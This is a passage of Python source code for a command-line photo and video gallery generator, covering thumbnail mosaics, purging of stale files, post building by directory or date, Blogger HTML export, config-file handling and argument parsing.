always created as they depend on the content of the\n # directory\n print('Making thumbnail:', thumb_name)\n create_thumbnail_subdir(subdir_name, thumb_name, size, items, thumbdir)\n\n\ndef create_thumbnail_subdir(subdir_name, thumb_name, size, items, thumbdir):\n\n def size_thumbnail(width, height, xmax, ymax):\n width2 = xmax\n height2 = int(round(xmax * height / width))\n if height2 < ymax:\n width2 = int(round(ymax * width / height))\n height2 = ymax\n return width2, height2\n\n thumblist = [os.path.basename(item.thumb) for item in items]\n widthnum, heightnum, width, height, offsetx, offsety = mosaic_geometry(size, thumblist)\n thumbnum = widthnum * heightnum\n img = Image.new('RGB', size, SUBDIR_BACKCOL)\n\n for ind, thumb in enumerate(thumblist[:min(thumbnum, len(thumblist))]):\n row = ind // widthnum\n col = ind % widthnum\n img2 = Image.open(os.path.join(thumbdir, thumb))\n w, h = size_thumbnail(*img2.size, width[col], height[row])\n cropdim = ((w - width[col]) // 2, (h - height[row]) // 2,\n (w - width[col]) // 2 + width[col], (h - height[row]) // 2 + height[row])\n img2 = img2.resize((w, h), Image.LANCZOS)\n img2 = img2.crop(cropdim)\n img.paste(img2, (offsetx[col], offsety[row]))\n\n if os.path.exists(thumb_name):\n # test if the generated thumbnail is identical to the one already on disk\n imgref = Image.open(thumb_name)\n\n # must save and reload before comparing\n byteio = io.BytesIO()\n img.save(byteio, \"JPEG\")\n byteio.seek(0)\n imgnew = Image.open(byteio)\n\n diff = ImageChops.difference(imgnew, imgref)\n if diff.getbbox() is None:\n return\n\n img.save(thumb_name)\n\n\ndef mosaic_geometry(size, thumblist):\n if len(thumblist) == 1:\n widthnum = 1\n heightnum = 1\n elif len(thumblist) <= 3:\n widthnum = 1\n heightnum = 2\n elif len(thumblist) <= 8:\n widthnum = 2\n heightnum = 2\n else:\n widthnum = 3\n heightnum = 3\n\n if widthnum == 1:\n width = [size[0] - 2]\n else:\n width = [size[0] // widthnum - 2] * (widthnum - 1)\n width.append(size[0] - (1 + sum(width) + 2 * len(width) + 1))\n\n if heightnum == 1:\n height = [size[1] - 2]\n else:\n height = [size[1] // heightnum - 2] * (heightnum - 1)\n height.append(size[1] - (1 + sum(height) + 2 * len(height) + 1))\n\n offsetx = [1]\n for w in width[:-1]:\n offsetx.append(offsetx[-1] + w + 2)\n\n offsety = [1]\n for h in height[:-1]:\n offsety.append(offsety[-1] + h + 2)\n\n return widthnum, heightnum, width, height, offsetx, offsety\n\n\ndef list_of_htmlfiles(args, posts):\n htmlist = list()\n htmlist.append(os.path.join(args.dest, args.rootname))\n for post in posts:\n htmlist.extend(list_of_htmlfiles_in_items(post.dcim))\n return htmlist\n\n\ndef list_of_htmlfiles_in_items(itemlist):\n htmlist = list()\n for item in itemlist:\n if type(item) == PostSubdir:\n htmlist.append(item.htmname)\n htmlist.extend(list_of_htmlfiles_in_items(item.sublist))\n return htmlist\n\n\ndef list_of_thumbnails(posts, diary=False):\n thumblist = list()\n for post in posts:\n thumblist.extend(list_of_thumbnails_in_items(post.medias))\n if diary is False:\n thumblist.extend(list_of_thumbnails_in_items(post.dcim))\n return thumblist\n\n\ndef list_of_thumbnails_in_items(itemlist):\n thumblist = list()\n for item in itemlist:\n if type(item) == PostSubdir:\n thumblist.append(os.path.basename(item.thumb))\n thumblist.extend(list_of_thumbnails_in_items(item.sublist))\n else:\n thumblist.append(os.path.basename(item.thumb))\n return thumblist\n\n\ndef purge_htmlfiles(args, posts):\n \"\"\"\n Purge root dir from irrelevant html files\n \"\"\"\n htmlist 
= list_of_htmlfiles(args, posts)\n html_to_remove = list()\n for fullname in glob.glob(os.path.join(args.root, '*.htm*')):\n if fullname not in htmlist:\n html_to_remove.append(fullname)\n\n if len(html_to_remove) > args.thumbnails.threshold_htmlfiles:\n inpt = 'x'\n while inpt not in 'yn':\n inpt = input(f'{len(html_to_remove)} html files to remove. Continue [y|n]? ').lower()\n if inpt == 'n':\n return\n\n for name in html_to_remove:\n print('Removing html files', name)\n os.remove(name)\n\n\ndef purge_thumbnails(args, thumbdir, posts, diary=False):\n \"\"\"\n Purge thumbnail dir from irrelevant thumbnails\n \"\"\"\n thumblist = list_of_thumbnails(posts, diary)\n thumbs_to_remove = list()\n for fullname in glob.glob(os.path.join(thumbdir, '*.jpg')):\n if os.path.basename(fullname) not in thumblist:\n thumbs_to_remove.append(fullname)\n\n if len(thumbs_to_remove) > args.thumbnails.threshold_thumbs:\n inpt = 'x'\n while inpt not in 'yn':\n inpt = input(f'{len(thumbs_to_remove)} thumbnails to remove. Continue [y|n]? ').lower()\n if inpt == 'n':\n return\n\n for name in thumbs_to_remove:\n print('Removing thumbnail', name)\n os.remove(name)\n info_fullname = os.path.splitext(name)[0] + '.info'\n if os.path.exists(info_fullname):\n os.remove(info_fullname)\n\n\n# -- List of medias helpers ---------------------------------------------------\n\n\ndef is_media_within_dates(fullname, dates):\n if is_media(fullname):\n if type(dates) == tuple:\n return dates[0] <= date_from_item(fullname) <= dates[1]\n else:\n return True\n else:\n return False\n\n\ndef sorted_listdir(filelist):\n like_windows_explorer = True\n\n if not filelist:\n return filelist\n\n if like_windows_explorer:\n maxlen = max(len(os.path.splitext(name)[0]) for name in filelist)\n def keyfunc(name):\n root, ext = os.path.splitext(name.lower())\n return root.ljust(maxlen, ' ') + ext\n else:\n keyfunc = str.lower\n\n return sorted(filelist, key=keyfunc)\n\n\ndef list_of_files(sourcedir, recursive):\n \"\"\"\n Return the list of full paths for files in source directory\n \"\"\"\n result = list()\n if recursive is False:\n listdir = sorted_listdir(os.listdir(sourcedir))\n if '.nomedia' not in listdir:\n for basename in listdir:\n result.append(os.path.join(sourcedir, basename))\n else:\n for root, dirs, files in os.walk(sourcedir):\n if '.nomedia' not in files:\n for basename in sorted_listdir(files):\n result.append(os.path.join(root, basename))\n return result\n\n\ndef list_of_medias(args, sourcedir, recursive):\n \"\"\"\n Return the list of full paths for pictures and movies in source directory\n \"\"\"\n files = list_of_files(sourcedir, recursive)\n return [_ for _ in files if is_media_within_dates(_, args.dates)]\n\n\ndef list_of_medias_ext(args, sourcedir):\n \"\"\"\n Return the list of full paths for pictures and movies in source directory\n plus subdirectories containing media\n \"\"\"\n result = list()\n listdir = sorted_listdir(os.listdir(sourcedir))\n if '.nomedia' not in listdir:\n for basename in listdir:\n fullname = os.path.join(sourcedir, basename)\n if os.path.isdir(fullname) and basename != '$RECYCLE.BIN' and contains_media(args, fullname):\n result.append(fullname)\n else:\n if is_media_within_dates(fullname, args.dates):\n result.append(fullname)\n return result\n\n\ndef contains_media(args, dirname):\n for root, dirs, files in os.walk(dirname):\n if '.nomedia' not in files:\n for basename in files:\n if is_media_within_dates(os.path.join(root, basename), args.dates):\n return True\n else:\n return False\n\n\ndef 
dispatch_post_items(list_of_post_items):\n subdirs = [_ for _ in list_of_post_items if type(_) is PostSubdir]\n medias = [_ for _ in list_of_post_items if type(_) is not PostSubdir]\n return subdirs, medias\n\n\n# -- Creation of gallery element ----------------------------------------------\n\n\ndef create_item(args, media_fullname, sourcedir, thumbdir, key, thumbmax):\n if os.path.isfile(media_fullname):\n if is_image_file(media_fullname):\n return create_item_image(args, media_fullname, sourcedir, thumbdir, key, thumbmax)\n else:\n return create_item_video(args, media_fullname, sourcedir, thumbdir, key, thumbmax)\n else:\n return create_item_subdir(args, media_fullname, sourcedir, thumbdir, key, thumbmax)\n\n\ndef create_item_image(args, media_fullname, sourcedir, thumbdir, key, thumbmax):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n\n try:\n info, infofmt = get_image_info(media_fullname)\n infofmt = media_basename + ': ' + infofmt\n thumbsize = size_thumbnail(info[2], info[3], thumbmax)\n make_thumbnail_image(args, media_fullname, thumb_fullname, thumbsize)\n return PostImage(None, media_fullname, '/'.join((args.thumbrep, thumb_basename)),\n thumbsize, infofmt)\n except PIL.UnidentifiedImageError:\n # corrupted image\n warning('Unable to read image', media_fullname)\n return None\n\n\ndef create_item_video(args, media_fullname, sourcedir, thumbdir, key, thumbmax):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n info_fullname = os.path.splitext(thumb_fullname)[0] + '.info'\n\n try:\n info, infofmt = get_video_info(media_fullname, info_fullname)\n infofmt = media_basename + ': ' + infofmt\n thumbsize = size_thumbnail(info[2], info[3], thumbmax)\n make_thumbnail_video(args, media_fullname, thumb_fullname, thumbsize, duration=info[5])\n return PostVideo(None, media_fullname, '/'.join((args.thumbrep, thumb_basename)),\n thumbsize, infofmt)\n except CalledProcessError:\n # corrupted video\n warning('Unable to read video', media_fullname)\n return None\n\n\ndef create_item_subdir(args, media_fullname, sourcedir, thumbdir, key, thumbmax):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n\n info, infofmt = None, None\n thumbsize = (thumbmax, int(round(thumbmax / 640 * 480)))\n\n medias_ext = list_of_medias_ext(args, media_fullname)\n if not medias_ext:\n return None\n\n item = PostSubdir(None, media_fullname, '/'.join((args.thumbrep, thumb_basename)),\n thumbsize, infofmt)\n item.htmname = os.path.join(os.path.dirname(thumbdir), media_relname + args.html_suffix)\n if args.thumbnails.subdir_caption:\n item.caption = media_basename\n else:\n item.caption = ''\n\n _, posts = make_posts(args, media_fullname)\n item.posts = posts\n items = [item for post in posts for item in post.dcim]\n item.sublist = items\n\n make_thumbnail_subdir(args, media_fullname, thumb_fullname, thumbsize, items, thumbdir)\n return item\n\n\ndef relative_name(media_fullname, sourcedir):\n \"\"\"\n /Gilles/Dev/journal/tests/subdir/deeper2/deepest/OCT_20000112_000004.jpg\n -->\n 
deeper2_deepest_OCT_20000112_000004.jpg\n\n /Gilles/Dev/journal/tests/subdir/deeper2/deepest\n -->\n deeper2_deepest\n \"\"\"\n x = os.path.relpath(media_fullname, sourcedir)\n x = x.replace('\\\\', '_').replace('/', '_').replace('#', '_')\n return x\n\n\n# -- Creation of posts --------------------------------------------------------\n\n\ndef make_posts(args, dirname):\n if args.diary is True:\n if not args.sourcedir:\n return make_posts_from_diary(args)\n else:\n return make_posts_from_diary_and_dir(args)\n elif args.bydate is False:\n return make_posts_from_subdir(args, dirname)\n else:\n return make_posts_from_subdir_and_date(args, dirname)\n\n\ndef make_posts_from_diary(args):\n md_filename = os.path.join(args.root, 'index.md')\n if os.path.exists(md_filename):\n title, posts = parse_markdown(md_filename)\n else:\n error('File not found', md_filename)\n\n for post in posts:\n for media in post.medias:\n media_fullname = os.path.join(args.root, media.uri)\n item = create_item(args, media_fullname, args.root, args.thumbdir, 'post', 400)\n media.thumb = item.thumb\n media.thumbsize = item.thumbsize\n media.descr = item.descr\n\n return title, posts\n\n\ndef create_items_by_date(args, medias, posts):\n # list of required dates\n if args.dates == 'diary':\n required_dates = {post.date for post in posts}\n else:\n required_dates = {date_from_item(media) for media in medias}\n if type(args.dates) == tuple:\n date1, date2 = args.dates\n required_dates = {date for date in required_dates if date1 <= date <= date2}\n\n bydate = defaultdict(list)\n for media_fullname in medias:\n date = date_from_item(media_fullname)\n if date in required_dates:\n item = create_item(args, media_fullname, args.sourcedir, args.thumbdir, 'dcim', 300)\n if item:\n bydate[date].append(item)\n\n for date, liste in bydate.items():\n liste.sort(key=lambda item: time_from_item(item.uri))\n\n return bydate\n\n\ndef make_posts_from_diary_and_dir(args):\n title, posts = make_posts_from_diary(args)\n\n # list of all pictures and movies\n medias = list_of_medias(args, args.sourcedir, args.recursive)\n\n bydate = create_items_by_date(args, medias, posts)\n\n # make list of extra dates (not in posts)\n extradates = set(bydate) - {post.date for post in posts}\n\n # complete posts with extra dates\n for date in extradates:\n post = Post.from_date(date)\n post.extra = True\n bisect.insort(posts, post)\n\n # several posts can have the same date, only the first one is completed with dcim medias\n for post in posts:\n if post.date in bydate and post.daterank == 1:\n post.dcim = bydate[post.date]\n\n return title, posts\n\n\ndef make_posts_from_subdir(args, dirname):\n # list of pictures and movies plus subdirectories\n if args.bydir is False:\n medias_ext = list_of_medias(args, dirname, args.recursive)\n else:\n medias_ext = list_of_medias_ext(args, dirname)\n\n #required_dates = get_required_dates(args, medias_ext, posts=None)\n #medias_ext_bis = []\n #for media in medias_ext:\n # if complies_with_required_dates(media):\n # medias_ext_bis.append(media)\n\n # complete posts\n postmedias = list()\n for item in medias_ext:\n postmedia = create_item(args, item, args.sourcedir, args.thumbdir, 'dcim', 300)\n if postmedia is not None:\n postmedias.append(postmedia)\n\n post = Post(date='00000000', text='', medias=[])\n post.dcim = postmedias\n posts = [post]\n title = os.path.basename(args.sourcedir) or os.path.splitdrive(args.sourcedir)[0]\n\n return title, posts\n\n\ndef make_posts_from_subdir_and_date(args, dirname):\n # list of all 
pictures and movies\n if args.bydir is False:\n medias = list_of_medias(args, dirname, args.recursive)\n subdirs = []\n else:\n medias_ext = list_of_medias_ext(args, dirname)\n medias = [_ for _ in medias_ext if is_media(_)]\n subdirs = [_ for _ in medias_ext if not is_media(_)]\n\n # create list of posts with a single post containing all subdirs\n posts = list()\n items = list()\n for media_fullname in subdirs:\n item = create_item(args, media_fullname, args.sourcedir, args.thumbdir, 'dcim', 300)\n if item:\n items.append(item)\n if items:\n post = Post(date='00000000', text='', medias=[])\n post.dcim = items\n posts.append(post)\n\n bydate = create_items_by_date(args, medias, posts)\n\n # add dates\n for date in sorted(bydate):\n post = Post.from_date(date)\n post.dcim = bydate[post.date]\n posts.append(post)\n title = os.path.basename(args.sourcedir) or os.path.splitdrive(args.sourcedir)[0]\n\n return title, posts\n\n\n# -- Creation of html page from directory tree --------------------------------\n\n\ndef create_gallery(args):\n title, posts = make_posts(args, args.sourcedir)\n print_html(args, posts, title, os.path.join(args.dest, args.rootname), 'regular')\n purge_htmlfiles(args, posts)\n if args.diary and not args.sourcedir:\n purge_thumbnails(args, args.thumbdir, posts, diary=True)\n else:\n purge_thumbnails(args, args.thumbdir, posts)\n\n\n# -- Creation of diary from medias --------------------------------------------\n\n\ndef create_diary(args):\n # list of all pictures and movies\n medias = list_of_medias(args, args.sourcedir, args.recursive)\n\n # list of required dates\n if args.dates == 'diary':\n assert 0\n else:\n required_dates = {date_from_item(media) for media in medias}\n if type(args.dates) == tuple:\n date1, date2 = args.dates\n required_dates = {date for date in required_dates if date1 <= date <= date2}\n\n title = args.sourcedir\n posts = list()\n for date in sorted(required_dates):\n posts.append(Post.from_date(date))\n\n os.makedirs(args.root, exist_ok=True)\n print_markdown(posts, title, os.path.join(args.root, 'index.md'))\n\n\n# -- Export to blogger---------------------------------------------------------\n\n\ndef online_images_url(args):\n try:\n if args.urlblogger.startswith('http:') or args.urlblogger.startswith('https:'):\n with urlopen(args.urlblogger) as u:\n buffer = u.read()\n else:\n with open(args.urlblogger, 'rb') as f:\n buffer = f.read()\n except:\n error('Unable to read url', args.urlblogger)\n buffer = buffer.decode('utf-8')\n\n online_images = dict()\n for match in re.finditer('<div class=\"separator\"((?!<div).)*?</div>', buffer, flags=re.DOTALL):\n div_separator = match.group(0)\n div_separator = div_separator.replace(' ', '')\n elem_div = objectify.fromstring(div_separator)\n for elem_a in elem_div.iterchildren(tag='a'):\n href = elem_a.get(\"href\")\n thumb = elem_a.img.get(\"src\")\n online_images[os.path.basename(href)] = (href, thumb)\n\n # video insertion relies only on video order\n online_videos = list()\n for match in re.finditer('<iframe allowfullscreen=\"allowfullscreen\".*?</iframe>', buffer, flags=re.DOTALL):\n iframe = match.group(0)\n online_videos.append(iframe)\n\n return online_images, online_videos\n\n\ndef compare_image_buffers(imgbuf1, imgbuf2):\n \"\"\"\n return True if images read on file are identical, False otherwise\n \"\"\"\n with io.BytesIO(imgbuf1) as imgio1, io.BytesIO(imgbuf2) as imgio2:\n img1 = Image.open(imgio1)\n img2 = Image.open(imgio2)\n diff = ImageChops.difference(img1, img2)\n return not 
diff.getbbox()\n\n\ndef check_images(args, posts, online_images):\n result = True\n for post in posts:\n for media in post.medias:\n if type(media) is PostImage:\n if media.basename in online_images:\n with open(os.path.join(args.root, media.uri), 'rb') as f:\n imgbuf1 = f.read()\n try:\n with urlopen(online_images[media.basename][0]) as u:\n imgbuf2 = u.read()\n except FileNotFoundError:\n print('File not found', online_images[media.basename][0])\n next\n if compare_image_buffers(imgbuf1, imgbuf2) is False:\n print('Files are different, upload', media.basename)\n else:\n if 1:\n print('File already online', media.basename)\n else:\n print('File is absent, upload', media.basename)\n result = False\n elif type(media) is PostVideo:\n # no check for the moment\n print('Video not checked', media.basename)\n else:\n assert False\n return result\n\n\ndef compose_blogger_html(args, title, posts, imgdata, online_videos):\n \"\"\" Compose html with blogger image urls\n \"\"\"\n for post in posts:\n for media in post.medias:\n if type(media) is PostImage:\n if media.uri not in imgdata:\n print('Image missing: ', media.uri)\n else:\n img_url, resized_url = imgdata[media.uri]\n media.uri = img_url\n media.resized_url = resized_url\n elif type(media) is PostVideo:\n if not online_videos:\n print('Video missing: ', media.uri)\n else:\n media.iframe = online_videos[0]\n del online_videos[0]\n else:\n assert False\n\n return print_html(args, posts, title, '', target='blogger')\n\n\ndef prepare_for_blogger(args):\n \"\"\"\n Export blogger html to clipboard.\n If --full, export complete html, otherwise export html extract ready to\n paste into blogger edit mode.\n \"\"\"\n title, posts = parse_markdown(os.path.join(args.root, 'index.md'))\n online_images, online_videos = online_images_url(args)\n\n if args.check_images and check_images(args, posts, online_images) is False:\n pass\n\n html = compose_blogger_html(args, title, posts, online_images, online_videos)\n\n if args.full is False:\n html = re.search('<body>(.*)?</body>', html, flags=re.DOTALL).group(1)\n html = re.sub('<script>.*?</script>', '', html, flags=re.DOTALL)\n html = STYLE.replace('%%', '%') + html\n\n if args.dest:\n with open(args.dest, 'wt', encoding='utf-8') as f:\n f.write(html)\n else:\n clipboard.copy(html)\n\n\n# -- Other commands -----------------------------------------------------------\n\n\ndef idempotence(args):\n \"\"\"\n For testing identity between a diary file and the fle obtained after reading\n and printing it. 
See testing.\n \"\"\"\n title, posts = parse_markdown(os.path.join(args.root, 'index.md'))\n print_markdown(posts, title, os.path.join(args.dest, 'index.md'))\n\n\n# -- Configuration file ------------------------------------------------------\n\n\n# The following docstring is used to create the configuration file.\nCONFIG_DEFAULTS = \"\"\"\\\n[source]\n\n; source directory\n; value: valid path\nsourcedir = .\n\n; one web page per directory\n; value: true or false\nbydir = false\n\n; dispatch medias by dates\n; value: true or false\nbydate = false\n\n; include text and medias from diary file\n; value: true or false\ndiary = false\n\n; include subdirectories recursively (used when bydir is false)\n; value: true or false\nrecursive = false\n\n; interval of dates to include\n; value: source|diary|yyyymmdd-yyyymmdd or empty (= source)\ndates =\n\n; github Pages compatibility (.htlml extension and no dot in directory names)\n; value: true or false\ngithub_pages = false\n\n[thumbnails]\n\n; specifies whether or not the gallery displays media description (size, dimension, etc)\n; value: true or false\nmedia_description = true\n\n; specifies whether subdir captions are empty or the name of the subdir\n; value: true or false\nsubdir_caption = true\n\n; timestamp of thumbnail in video\n; value: number of seconds\nthumbdelay = 5\n\n; maximum number of thumbnails to remove without user confirmation\n; value: integer\nthreshold_thumbs = 10\n\n[photobox]\n\n; Allows to navigate between first and last images\n; value: true or false\nloop = false\n\n; Show gallery thumbnails below the presented photo\n; value: true or false\nthumbs = true\n\n; Should autoplay on first time or not\n; value: true or false\nautoplay = false\n\n; Autoplay interval (less than 1000 will hide the autoplay button)\n; value: milliseconds\ntime = 3000\n\n; Disable/enable mousewheel image zooming\n; value: true or false\nzoomable = true\n\n; Allow rotation of the image\n; value: true or false\nrotatable = true\n\n; Change image using mousewheel left/right\n; value: true or false\nwheelNextPrev = true\n\"\"\"\n\n\nclass MyConfigParser (ConfigParser):\n \"\"\"Add input checking.\"\"\"\n def __init__(self):\n ConfigParser.__init__(self, inline_comment_prefixes=(';',))\n\n def error(self, section, entry):\n error('Missing or incorrect config value:', '[%s]%s' % (section, entry))\n\n def getint(self, section, entry, default=None):\n try:\n if default is None:\n return ConfigParser.getint(self, section, entry)\n else:\n return ConfigParser.getint(self, section, entry, raw=True, vars=None, fallback=default)\n except Exception as e:\n print(e)\n self.error(section, entry)\n\n def getboolean(self, section, entry, default=None):\n try:\n if default is None:\n return ConfigParser.getboolean(self, section, entry)\n else:\n return ConfigParser.getboolean(self, section, entry, raw=True, vars=None, fallback=default)\n except Exception as e:\n print(e)\n self.error(section, entry)\n\n\ndef configfilename(params):\n return os.path.join(params.root, '.config.ini')\n\n\ndef createconfig(config_filename):\n with open(config_filename, 'wt') as f:\n f.writelines(CONFIG_DEFAULTS)\n\n\ndef read_config(params):\n config_filename = configfilename(params)\n\n try:\n if not os.path.exists(config_filename) or params.resetcfg:\n createconfig(config_filename)\n except:\n error('Error creating configuration file')\n\n try:\n getconfig(params, config_filename)\n except Exception as e:\n error('Error reading configuration file.', str(e), 'Use --resetcfg')\n\n\ndef 
getconfig(options, config_filename):\n class Section:\n pass\n\n options.source = Section()\n options.thumbnails = Section()\n options.photobox = Section()\n\n config = MyConfigParser()\n config.read(config_filename)\n\n # [source]\n options.source.sourcedir = config.get('source', 'sourcedir')\n options.source.bydir = config.getboolean('source', 'bydir')\n options.source.bydate = config.getboolean('source', 'bydate')\n options.source.diary = config.getboolean('source', 'diary')\n options.source.recursive = config.getboolean('source', 'recursive')\n options.source.dates = config.get('source', 'dates')\n options.source.github_pages = config.getboolean('source', 'github_pages', default=False)\n\n # [thumbnails]\n options.thumbnails.media_description = config.getboolean('thumbnails', 'media_description')\n options.thumbnails.subdir_caption = config.getboolean('thumbnails', 'subdir_caption')\n options.thumbnails.thumbdelay = config.getint('thumbnails', 'thumbdelay')\n options.thumbnails.threshold_thumbs = config.getint('thumbnails', 'threshold_thumbs')\n options.thumbnails.threshold_htmlfiles = config.getint('thumbnails', 'threshold_htmlfiles', default=3)\n\n # [photobox]\n options.photobox.loop = config.getboolean('photobox', 'loop')\n options.photobox.thumbs = config.getboolean('photobox', 'thumbs')\n options.photobox.autoplay = config.getboolean('photobox', 'autoplay')\n options.photobox.time = config.getint('photobox', 'time')\n options.photobox.zoomable = config.getboolean('photobox', 'zoomable')\n options.photobox.rotatable = config.getboolean('photobox', 'rotatable')\n options.photobox.wheelNextPrev = config.getboolean('photobox', 'wheelNextPrev')\n\n\ndef setconfig(cfgname, section, key, value):\n config = MyConfigParser()\n config.read(cfgname)\n config.set(section, key, value)\n with open(cfgname, 'wt') as configfile:\n config.write(configfile)\n\n\ndef setconfig_cmd(args):\n config_filename = configfilename(args)\n setconfig(config_filename, *args.setcfg)\n\n\ndef update_config(args):\n # update only entries which can be modified from the command line (source section)\n updates = (\n ('sourcedir', args.sourcedir),\n ('bydir', BOOL[args.bydir]),\n ('bydate', BOOL[args.bydate]),\n ('diary', BOOL[args.diary]),\n ('recursive', BOOL[args.recursive]),\n ('dates', args.dates),\n ('github_pages', BOOL[args.github_pages]),\n )\n\n # manual update to keep comments\n cfgname = configfilename(args)\n with open(cfgname) as f:\n cfglines = [_.strip() for _ in f.readlines()]\n\n for key, value in updates:\n for iline, line in enumerate(cfglines):\n if line.startswith(key):\n cfglines[iline] = f'{key} = {value}'\n break\n\n with open(cfgname, 'wt') as f:\n for line in cfglines:\n print(line, file=f)\n\n\n# -- Error handling -----------------------------------------------------------\n\n\ndef warning(*msg):\n print(colorama.Fore.YELLOW + colorama.Style.BRIGHT +\n ' '.join(msg),\n colorama.Style.RESET_ALL)\n\n\n# Every error message error must be declared here to give a return code to the error\nERRORS = '''\\\nFile not found\nDirectory not found\nNo date in post\nIncorrect date value:\nPosts are not ordered\nUnable to read url\nNo image source (--sourcedir)\nNo blogger url (--url)\nMissing or incorrect config value:\nError creating configuration file\nError reading configuration file.\nIncorrect date format\nIncorrect parameters:\n'''\n\n\ndef errorcode(msg):\n return ERRORS.splitlines().index(msg) + 1\n\n\ndef error(*msg):\n print(colorama.Fore.RED + colorama.Style.BRIGHT +\n ' '.join(msg),\n 
colorama.Style.RESET_ALL)\n sys.exit(errorcode(msg[0]))\n\n\n# -- Main ---------------------------------------------------------------------\n\n\nBOOL = ('false', 'true')\n\n\ndef parse_command_line(argstring):\n parser = argparse.ArgumentParser(description=None, usage=USAGE)\n\n agroup = parser.add_argument_group('Commands')\n xgroup = agroup.add_mutually_exclusive_group()\n xgroup.add_argument('--gallery', help='source in --sourcedir',\n action='store', metavar='<root-dir>')\n agroup.add_argument('--update', help='updates gallery with parameters in config file',\n action='store', metavar='<root-dir>')\n xgroup.add_argument('--create', help='create journal from medias in --sourcedir',\n action='store', metavar='<root-dir>')\n # testing\n xgroup.add_argument('--resetcfg', help='reset config file to defaults',\n action='store', metavar='<root-dir>')\n xgroup.add_argument('--setcfg', help=argparse.SUPPRESS,\n action='store', nargs=4, metavar='<root-dir>')\n xgroup.add_argument('--idem', help=argparse.SUPPRESS,\n action='store', metavar='<root-dir>')\n # blogger\n xgroup.add_argument('--blogger',\n help='input md, html blogger ready in clipboard',\n action='store', metavar='<root-dir>')\n\n agroup = parser.add_argument_group('Parameters')\n agroup.add_argument('--bydir', help='organize gallery by subdirectory',\n action='store', default=None, choices=BOOL)\n agroup.add_argument('--bydate', help='organize gallery by date',\n action='store', default=None, choices=BOOL)\n agroup.add_argument('--diary', help='organize gallery using markdown file diary',\n action='store', default=None, choices=BOOL)\n agroup.add_argument('--recursive', help='--sourcedir scans recursively',\n action='store', default=None, choices=BOOL)\n agroup.add_argument('--dates', help='dates interval',\n action='store', default=None)\n agroup.add_argument('--sourcedir', help='media directory',\n action='store', default=None)\n agroup.add_argument('--github_pages', help='github Pages compatibility',\n action='store', default=None, choices=BOOL)\n agroup.add_argument('--dest', help='output directory',\n action='store')\n agroup.add_argument('--forcethumb', help='force calculation of thumbnails',\n action='store_true', default=False)\n\n agroup.add_argument('--full', help='full html (versus blogger ready html)',\n action='store_true', default=False)\n agroup.add_argument('--check', dest='check_images', help='check availability of medias on blogger',\n action='store_true')\n agroup.add_argument('--url', dest='urlblogger', help='blogger post url',\n action='store')\n\n if argstring is None:\n print('Type \"galerie -h\" for help')\n sys.exit(1)\n else:\n args = parser.parse_args(argstring.split())\n\n if args.update and (args.bydir or args.bydate or args.diary or args.sourcedir or\n args.recursive or args.dates or args.github_pages):\n error('Incorrect parameters:',\n '--update cannot be used with creation parameters, use explicit command')\n\n args.bydir = args.bydir == 'true'\n args.bydate = args.bydate == 'true'\n args.diary = args.diary == 'true'\n args.recursive = args.recursive == 'true'\n args.dates = 'source' if (args.dates is None) else args.dates\n args.github_pages = args.github_pages == 'true'\n\n args.root = (\n args.create or args.gallery or args.update\n or args.blogger or args.idem or args.resetcfg\n )\n\n if args.setcfg:\n args.root = args.setcfg[0]\n args.setcfg = args.setcfg[1:]\n\n return args\n\n\ndef setup_part1(args):\n \"\"\"\n Made before reading config file (config file located in args.root).\n Check and 
normalize root path.\n \"\"\"\n args.rootarg = args.root\n rootext = os.path.splitext(args.rootarg)[1]\n if rootext == '':\n pass\n else:\n args.root = os.path.dirname(args.root)\n\n if args.root:\n args.root = os.path.abspath(args.root)\n if not os.path.isdir(args.root):\n if args.gallery:\n os.mkdir(args.root)\n else:\n error('Directory not found', args.root)\n\n\ndef setup_part2(args):\n \"\"\"\n Made after reading config file.\n Check for ffmpeg in path.\n Create .thumbnails dir if necessary and create .nomedia in it.\n Copy photobox file to destination dir.\n Handle priority between command line and config file.\n \"\"\"\n if args.update:\n args.sourcedir = args.source.sourcedir\n args.bydir = args.source.bydir\n args.bydate = args.source.bydate\n args.diary = args.source.diary\n args.recursive = args.source.recursive\n args.dates = args.source.dates\n args.github_pages = args.source.github_pages\n elif args.gallery:\n args.source.sourcedir = args.sourcedir\n args.source.bydir = args.bydir\n args.source.bydate = args.bydate\n args.source.diary = args.diary\n args.source.recursive = args.recursive\n args.source.dates = args.dates\n args.source.github_pages = args.github_pages\n update_config(args)\n\n if args.github_pages:\n args.html_suffix = '.html'\n else:\n args.html_suffix = '.htm'\n\n rootext = os.path.splitext(args.rootarg)[1]\n if rootext:\n args.rootname = os.path.basename(args.rootarg)\n else:\n args.rootname = 'index' + args.html_suffix\n\n if args.sourcedir:\n args.sourcedir = os.path.abspath(args.sourcedir)\n if os.path.splitdrive(args.sourcedir)[0]:\n drive, rest = os.path.splitdrive(args.sourcedir)\n args.sourcedir = drive.upper() + rest\n if not os.path.isdir(args.sourcedir):\n error('Directory not found', args.sourcedir)\n else:\n if args.gallery and args.diary is False and args.update is None:\n error('Directory not found', 'Use --sourcedir')\n\n if args.dest:\n args.dest = os.path.abspath(args.dest)\n\n if args.dest is None:\n args.dest = args.root\n\n if args.blogger and args.urlblogger is None:\n error('No blogger url (--url)')\n\n if args.gallery or args.update:\n # check for ffmpeg and ffprobe in path\n for exe in ('ffmpeg', 'ffprobe'):\n try:\n check_output([exe, '-version'])\n except FileNotFoundError:\n error('File not found', exe)\n\n if args.github_pages:\n args.thumbrep = 'thumbnails'\n else:\n args.thumbrep = '.thumbnails'\n\n args.thumbdir = os.path.join(args.dest, args.thumbrep)\n if not os.path.exists(args.thumbdir):\n os.mkdir(args.thumbdir)\n open(os.path.join(args.thumbdir, '.nomedia'), 'a').close()\n\n favicondst = os.path.join(args.dest, 'favicon.ico')\n if not os.path.isfile(favicondst):\n faviconsrc = os.path.join(os.path.dirname(__file__), 'favicon.ico')\n shutil.copyfile(faviconsrc, favicondst)\n\n photoboxdir = os.path.join(args.dest, 'photobox')\n if not os.path.exists(photoboxdir):\n photoboxsrc = os.path.join(os.path.dirname(__file__), 'photobox')\n shutil.copytree(photoboxsrc, photoboxdir)\n\n if 